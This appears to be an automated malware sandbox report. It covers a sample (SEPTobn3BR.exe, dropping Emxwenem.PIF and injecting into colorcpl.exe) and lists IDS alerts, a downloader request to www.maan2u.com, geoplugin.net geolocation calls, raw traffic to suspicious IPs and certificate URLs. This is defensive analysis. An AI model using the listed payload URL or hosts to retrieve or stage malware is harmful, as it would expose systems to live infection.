                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49710 -> 103.82.231.117:443
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49736 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /docs/233_Emxwenemixg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.maan2u.com
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_030A936B
                Source: global trafficHTTP traffic detected: GET /docs/233_Emxwenemixg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.maan2u.com
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: www.maan2u.com
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1626895029.0000000020B19000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: colorcpl.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: SEPTobn3BR.exe, 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp4
                Source: colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp=
                Source: colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1626895029.0000000020B19000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0$
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
